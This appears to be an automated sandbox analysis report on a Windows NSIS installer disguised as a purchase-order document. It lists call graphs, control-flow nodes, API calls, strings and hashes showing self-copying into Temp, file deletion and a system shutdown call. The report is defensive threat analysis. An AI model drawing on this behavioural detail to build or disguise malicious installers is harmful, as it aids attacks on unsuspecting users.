2363->2357 2363->2358 2363->2360 2363->2361 2363->2362 2408 10001215 GlobalAlloc 2363->2408 2409 100012e8 2363->2409 2413 10001215 GlobalAlloc 2365->2413 2367 1000157c 2368 10001589 lstrcpyA 2367->2368 2370 100015a3 2367->2370 2371 100015bd 2368->2371 2370->2371 2372 100015a8 wsprintfA 2370->2372 2373 10001278 2371->2373 2372->2371 2374 10001281 GlobalAlloc lstrcpynA 2373->2374 2375 100012ba GlobalFree 2373->2375 2374->2375 2375->2278 2377 10002341 2376->2377 2379 100017e2 2376->2379 2378 1000235a GlobalFree 2377->2378 2377->2379 2378->2377 2379->2287 2379->2289 2381 10001278 2 API calls 2380->2381 2382 10001520 2381->2382 2382->2281 2383->2292 2384->2294 2386 10001274 2385->2386 2387 10001245 2385->2387 2386->2319 2387->2386 2398 10001215 GlobalAlloc 2387->2398 2389 10001251 lstrcpyA GlobalFree 2389->2319 2391 1000156f 2390->2391 2391->2316 2399 10001215 GlobalAlloc 2392->2399 2394 10001233 lstrcpynA 2394->2314 2395->2319 2396->2308 2397->2315 2398->2389 2399->2394 2401 100012e3 2400->2401 2402 100012c7 2400->2402 2401->2401 2402->2401 2403 10001224 2 API calls 2402->2403 2404 100012e1 2403->2404 2404->2326 2406 100024e2 VirtualAlloc 2405->2406 2407 10002538 2405->2407 2406->2407 2407->2329 2408->2363 2410 100012f1 2409->2410 2411 10001316 2409->2411 2410->2411 2412 100012fd lstrcpyA 2410->2412 2411->2363 2412->2411 2413->2367 2901 1000103d 2902 1000101b 8 API calls 2901->2902 2903 10001056 2902->2903

                                                                                                                                                                Callgraph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                • Disassembly available
                                                                                                                                                                callgraph 0 Function_10001000 13 Function_1000101B 0->13 1 Function_00405347 2 Function_00403548 7 Function_00405454 2->7 96 Function_0040358D 2->96 3 Function_00402B4C 4 Function_0040564F 5 Function_10002110 6 Function_00405854 7->4 7->7 22 Function_0040566B 7->22 30 Function_00405B77 7->30 33 Function_00405E7B 7->33 40 Function_0040540C 7->40 43 Function_00405712 7->43 51 Function_00405624 7->51 56 Function_00405A2B 7->56 92 Function_00404E84 7->92 8 Function_10001215 9 Function_00404F56 73 Function_00403ED3 9->73 94 Function_00401389 9->94 10 Function_00406A57 11 Function_10002718 12 Function_1000131B 12->12 106 Function_10002AE0 12->106 101 Function_100014D8 13->101 117 Function_100014FF 13->117 14 Function_1000271E 15 Function_00405A5E 16 Function_10002B20 17 Function_00403E60 18 Function_10001224 18->8 19 Function_10001A24 19->12 20 Function_10001525 21 Function_1000182A 21->12 21->16 32 Function_1000123B 21->32 37 Function_10001446 21->37 66 Function_10001278 21->66 71 Function_10002C90 21->71 86 Function_10002CB0 21->86 98 Function_10002BD0 21->98 21->106 23 Function_1000272C 24 Function_00402E6C 26 Function_00403072 24->26 91 Function_00405F82 24->91 24->92 109 Function_004030A4 24->109 25 Function_0040136D 82 Function_00405AEE 25->82 27 Function_00403572 28 Function_10002333 29 Function_10001637 63 Function_10001576 29->63 29->66 68 Function_10001A86 29->68 29->117 31 Function_1000273A 32->8 34 Function_1000103D 34->13 35 Function_10002540 35->20 36 Function_00405800 37->16 37->98 38 Function_10002748 39 Function_0040140B 39->94 40->36 41 Function_1000274E 42 Function_10001551 42->20 43->22 43->30 43->33 43->51 80 Function_00405DE2 43->80 116 Function_004056BD 43->116 44 Function_10002754 45 Function_00405F14 46 Function_10002A57 46->23 46->44 52 Function_10002765 46->52 59 Function_10002773 46->59 64 Function_10002777 46->64 47 Function_10001058 47->12 47->20 47->32 47->101 47->117 48 Function_1000275A 49 Function_0040611F 49->10 76 Function_00406AD8 49->76 87 Function_004069F2 49->87 50 Function_00403622 50->4 50->9 50->15 50->22 50->27 50->30 50->39 50->43 50->51 74 Function_00405AD5 50->74 81 Function_004038E7 50->81 102 Function_00405B99 50->102 108 Function_00405EA2 50->108 53 Function_10002165 54 Function_00405825 55 Function_1000276B 104 Function_0040589D 56->104 56->108 57 Function_1000236D 57->8 57->37 57->66 110 Function_100012E8 57->110 58 Function_1000276F 60 Function_10001573 61 Function_00402C33 61->22 61->24 61->26 61->30 61->45 61->54 70 Function_00402BCF 61->70 79 Function_004057E0 61->79 61->109 62 Function_00401434 63->8 65 Function_10002977 65->41 65->42 65->44 65->48 65->52 65->55 65->58 65->59 65->64 67 Function_1000277B 65->67 72 Function_10002790 65->72 68->8 68->12 68->18 68->19 68->32 68->37 68->42 89 Function_100015C1 68->89 69 Function_10002787 77 Function_00405EDB 70->77 75 Function_00405FD7 78 Function_1000279C 78->11 78->14 78->23 78->31 78->38 78->41 78->48 78->52 78->55 78->58 78->59 78->64 78->69 107 Function_10002CE0 78->107 80->4 80->79 99 Function_00405691 80->99 81->74 81->82 81->102 83 Function_00403EEE 84 Function_100021AF 84->12 84->18 84->32 88 Function_100012BF 84->88 100 Function_100024D4 84->100 85 Function_004030EF 85->1 85->2 85->4 85->30 85->39 85->43 85->50 85->56 85->61 85->102 85->108 111 Function_004053A8 85->111 114 Function_004030BB 85->114 88->18 90 Function_100026C2 91->49 91->75 92->102 93 Function_00403E87 93->102 94->25 94->62 95 Function_0040578A 96->27 97 Function_100015D0 97->101 101->12 101->32 102->15 102->30 102->74 102->80 102->102 103 Function_100016DA 103->28 103->35 103->46 103->53 103->57 103->63 103->66 103->68 103->78 103->84 103->117 104->54 104->79 104->95 104->102 105 Function_100010E0 105->20 105->32 105->66 105->88 105->110 112 Function_00403EA9 113 Function_004039B4 113->17 113->30 113->39 113->73 113->83 113->93 113->94 113->102 113->112 115 Function_00403EBC 113->115 114->6 114->51 114->80 114->99 116->4 117->66

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 4030ef-403186 #17 SetErrorMode OleInitialize call 405ea2 SHGetFileInfoA call 405b77 GetCommandLineA call 405b77 GetModuleHandleA 7 403192-4031a7 call 40564f CharNextA 0->7 8 403188-40318d 0->8 11 403267-40326b 7->11 8->7 12 403271 11->12 13 4031ac-4031af 11->13 14 403284-40329e GetTempPathA call 4030bb 12->14 15 4031b1-4031b5 13->15 16 4031b7-4031bf 13->16 25 4032a0-4032be GetWindowsDirectoryA lstrcatA call 4030bb 14->25 26 4032f6-403310 DeleteFileA call 402c33 14->26 15->15 15->16 17 4031c1-4031c2 16->17 18 4031c7-4031ca 16->18 17->18 20 4031d0-4031d4 18->20 21 403257-403264 call 40564f 18->21 23 4031d6-4031dc 20->23 24 4031e7-403214 20->24 21->11 40 403266 21->40 28 4031e2 23->28 29 4031de-4031e0 23->29 30 403216-40321c 24->30 31 403227-403255 24->31 25->26 44 4032c0-4032f0 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030bb 25->44 41 4033a4-4033b3 call 403548 OleUninitialize 26->41 42 403316-40331c 26->42 28->24 29->24 29->28 35 403222 30->35 36 40321e-403220 30->36 31->21 38 403273-40327f call 405b77 31->38 35->31 36->31 36->35 38->14 40->11 55 4033b9-4033c9 call 4053a8 ExitProcess 41->55 56 4034ad-4034b3 41->56 45 403394-40339b call 403622 42->45 46 40331e-403329 call 40564f 42->46 44->26 44->41 53 4033a0 45->53 59 40332b-403354 46->59 60 40335f-403369 46->60 53->41 57 403530-403538 56->57 58 4034b5-4034d2 call 405ea2 * 3 56->58 63 40353a 57->63 64 40353e-403542 ExitProcess 57->64 88 4034d4-4034d6 58->88 89 40351c-403527 ExitWindowsEx 58->89 65 403356-403358 59->65 66 40336b-403378 call 405712 60->66 67 4033cf-4033e9 lstrcatA lstrcmpiA 60->67 63->64 65->60 70 40335a-40335d 65->70 66->41 78 40337a-403390 call 405b77 * 2 66->78 67->41 72 4033eb-403400 CreateDirectoryA SetCurrentDirectoryA 67->72 70->60 70->65 75 403402-403408 call 405b77 72->75 76 40340d-403435 call 405b77 72->76 75->76 84 40343b-403457 call 405b99 DeleteFileA 76->84 78->45 95 403498-40349f 84->95 96 403459-403469 CopyFileA 84->96 88->89 93 4034d8-4034da 88->93 89->57 92 403529-40352b call 40140b 89->92 92->57 93->89 98 4034dc-4034ee GetCurrentProcess 93->98 95->84 100 4034a1-4034a8 call 405a2b 95->100 96->95 99 40346b-40348b call 405a2b call 405b99 call 405347 96->99 98->89 105 4034f0-403512 98->105 99->95 112 40348d-403494 CloseHandle 99->112 100->41 105->89 112->95
                                                                                                                                                                APIs
                                                                                                                                                                • #17.COMCTL32 ref: 00403110
                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 0040311B
                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403122
                                                                                                                                                                  • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                                                                                                                                                  • Part of subcall function 00405EA2: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                                                                                                                                                  • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                                                                                                                                                • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,00000008), ref: 0040314A
                                                                                                                                                                  • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                                                                                                                                                • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",00000000), ref: 00403172
                                                                                                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",00000020), ref: 0040319D
                                                                                                                                                                • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403295
                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032A6
                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032B2
                                                                                                                                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032C6
                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032CE
                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032DF
                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032E7
                                                                                                                                                                • DeleteFileA.KERNELBASE(1033), ref: 004032FB
                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 004033A9
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004033C9
                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe",00000000,?), ref: 004033D5
                                                                                                                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033E1
                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033ED
                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033F4
                                                                                                                                                                • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,007A3000,?), ref: 0040344D
                                                                                                                                                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,0079D8B8,00000001), ref: 00403461
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,00000000), ref: 0040348E
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E3
                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 0040351F
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403542
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                                                • String ID: "$"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe$C:\Users\user\udskriftskartotek\chiromancy\refalling$C:\Users\user\udskriftskartotek\chiromancy\refalling\Regionalize\Trade199\Fremlg\Fruitstalk$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                                                • API String ID: 4107622049-3473822740
                                                                                                                                                                • Opcode ID: a3e75096bba33f31aa827b02cc33142ec1426715b727b680d56db394eb4d4ef5
                                                                                                                                                                • Instruction ID: 3931d960d2cecc16523f178db0b803f8d2f925e5e1ab1ff86deffc182e7e2b76
                                                                                                                                                                • Opcode Fuzzy Hash: a3e75096bba33f31aa827b02cc33142ec1426715b727b680d56db394eb4d4ef5
                                                                                                                                                                • Instruction Fuzzy Hash: 01B10A709083816EE7116F755C4DA2B7EE8EB86306F04457EF181B62E2C77C9A05CB6E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 287 402c33-402c81 GetTickCount GetModuleFileNameA call 405825 290 402c83-402c88 287->290 291 402c8d-402cbb call 405b77 call 40566b call 405b77 GetFileSize 287->291 292 402e65-402e69 290->292 299 402cc1 291->299 300 402da8-402db6 call 402bcf 291->300 302 402cc6-402cdd 299->302 306 402db8-402dbb 300->306 307 402e0b-402e10 300->307 304 402ce1-402ce3 call 403072 302->304 305 402cdf 302->305 311 402ce8-402cea 304->311 305->304 309 402dbd-402dd5 call 4030a4 call 403072 306->309 310 402ddf-402e09 GlobalAlloc call 4030a4 call 402e6c 306->310 307->292 309->307 337 402dd7-402ddd 309->337 310->307 335 402e1c-402e2d 310->335 313 402cf0-402cf7 311->313 314 402e12-402e1a call 402bcf 311->314 319 402d73-402d77 313->319 320 402cf9-402d0d call 4057e0 313->320 314->307 324 402d81-402d87 319->324 325 402d79-402d80 call 402bcf 319->325 320->324 334 402d0f-402d16 320->334 331 402d96-402da0 324->331 332 402d89-402d93 call 405f14 324->332 325->324 331->302 336 402da6 331->336 332->331 334->324 340 402d18-402d1f 334->340 341 402e35-402e3a 335->341 342 402e2f 335->342 336->300 337->307 337->310 340->324 343 402d21-402d28 340->343 344 402e3b-402e41 341->344 342->341 343->324 345 402d2a-402d31 343->345 344->344 346 402e43-402e5e SetFilePointer call 4057e0 344->346 345->324 347 402d33-402d53 345->347 350 402e63 346->350 347->307 349 402d59-402d5d 347->349 351 402d65-402d6d 349->351 352 402d5f-402d63 349->352 350->292 351->324 353 402d6f-402d71 351->353 352->336 352->351 353->324
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402C44
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,00000400), ref: 00402C60
                                                                                                                                                                  • Part of subcall function 00405825: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,80000000,00000003), ref: 00405829
                                                                                                                                                                  • Part of subcall function 00405825: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,80000000,00000003), ref: 00402CAC
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                                                                                                                                                • "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe", xrefs: 00402C33
                                                                                                                                                                • C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                                                                                                                • Inst, xrefs: 00402D18
                                                                                                                                                                • Null, xrefs: 00402D2A
                                                                                                                                                                • soft, xrefs: 00402D21
                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                                                                                                                                                • Error launching installer, xrefs: 00402C83
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                • API String ID: 4283519449-3445924567
                                                                                                                                                                • Opcode ID: 7e6bea62646216416da1489436a3b000af82ae672027ee591beada05dc0c487d
                                                                                                                                                                • Instruction ID: 9cc68cb9a8033aa8cfa9fb84db7bfe2d2ab72e09e198f7c7f71ed61724ba903c
                                                                                                                                                                • Opcode Fuzzy Hash: 7e6bea62646216416da1489436a3b000af82ae672027ee591beada05dc0c487d
                                                                                                                                                                • Instruction Fuzzy Hash: 74510471D40204ABDB209F65DE89B6E7BA8EF40354F14403BFA04B62D1C7BC9E418BAD
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 354 405b99-405ba4 355 405ba6-405bb5 354->355 356 405bb7-405bcc 354->356 355->356 357 405bd2-405bdd 356->357 358 405dbf-405dc3 356->358 357->358 359 405be3-405bea 357->359 360 405dc9-405dd3 358->360 361 405bef-405bf9 358->361 359->358 363 405dd5-405dd9 call 405b77 360->363 364 405dde-405ddf 360->364 361->360 362 405bff-405c06 361->362 365 405db2 362->365 366 405c0c-405c41 362->366 363->364 368 405db4-405dba 365->368 369 405dbc-405dbe 365->369 370 405c47-405c52 GetVersion 366->370 371 405d5c-405d5f 366->371 368->358 369->358 372 405c54-405c58 370->372 373 405c6c 370->373 374 405d61-405d64 371->374 375 405d8f-405d92 371->375 372->373 378 405c5a-405c5e 372->378 381 405c73-405c7a 373->381 379 405d74-405d80 call 405b77 374->379 380 405d66-405d72 call 405ad5 374->380 376 405da0-405db0 lstrlenA 375->376 377 405d94-405d9b call 405b99 375->377 376->358 377->376 378->373 383 405c60-405c64 378->383 392 405d85-405d8b 379->392 380->392 385 405c7c-405c7e 381->385 386 405c7f-405c81 381->386 383->373 388 405c66-405c6a 383->388 385->386 390 405c83-405c9e call 405a5e 386->390 391 405cba-405cbd 386->391 388->381 397 405ca3-405ca6 390->397 393 405ccd-405cd0 391->393 394 405cbf-405ccb GetSystemDirectoryA 391->394 392->376 396 405d8d 392->396 400 405cd2-405ce0 GetWindowsDirectoryA 393->400 401 405d3a-405d3c 393->401 399 405d3e-405d41 394->399 398 405d54-405d5a call 405de2 396->398 402 405d43-405d47 397->402 403 405cac-405cb5 call 405b99 397->403 398->376 399->398 399->402 400->401 401->399 404 405ce2-405cec 401->404 402->398 407 405d49-405d4f lstrcatA 402->407 403->399 409 405d06-405d1c SHGetSpecialFolderLocation 404->409 410 405cee-405cf1 404->410 407->398 413 405d37 409->413 414 405d1e-405d35 SHGetPathFromIDListA CoTaskMemFree 409->414 410->409 412 405cf3-405cfa 410->412 415 405d02-405d04 412->415 413->401 414->399 414->413 415->399 415->409
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,00000000,00404EBC,Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,00000000), ref: 00405C4A
                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CC5
                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CD8
                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,0078F2A8), ref: 00405D14
                                                                                                                                                                • SHGetPathFromIDListA.SHELL32(0078F2A8,Call), ref: 00405D22
                                                                                                                                                                • CoTaskMemFree.OLE32(0078F2A8), ref: 00405D2D
                                                                                                                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D4F
                                                                                                                                                                • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,00000000,00404EBC,Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll,00000000), ref: 00405DA1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                • API String ID: 900638850-2214267173
                                                                                                                                                                • Opcode ID: 62d675d7ba4d7dd78eb3db4cf19b3261ec8909dcb0a8e4f793d05ab03d583e6e
                                                                                                                                                                • Instruction ID: 050506686e60d08a76f5c318217997e75ce046d50ca6fca7f220fc6f31a13d77
                                                                                                                                                                • Opcode Fuzzy Hash: 62d675d7ba4d7dd78eb3db4cf19b3261ec8909dcb0a8e4f793d05ab03d583e6e
                                                                                                                                                                • Instruction Fuzzy Hash: 5E61F471A04A05AAEF115F24CC88BBF3BA9EF52314F14813BE941BA2D1D27C5981DF5E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
